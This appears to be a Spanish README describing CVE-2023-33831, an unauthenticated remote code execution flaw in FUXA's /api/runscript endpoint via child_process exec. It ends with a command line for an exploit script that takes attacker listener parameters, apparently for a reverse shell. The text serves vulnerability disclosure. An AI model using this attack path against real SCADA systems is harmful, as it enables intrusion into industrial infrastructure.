Descripción y explotación de CVE-2023-33831 que afecta al software FUXA de visualización de procesos basado en web (SCADA/HMI/Dashboard).
La vulnerabilidad afecta al componente de scripting de FUXA, debido a la falta de control o saneamiento en las entradas que pueden ser controladas por los usuarios, permitiendo así el uso de métodos peligrosos que pueden escalar a ejecución remota de código. La ruta afectada es /api/runscript, donde es posible ejecutar comandos sin necesidad de autenticarse a través del parámetro code mediante el método POST, utilizando el módulo child_process a través de la función exec.
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>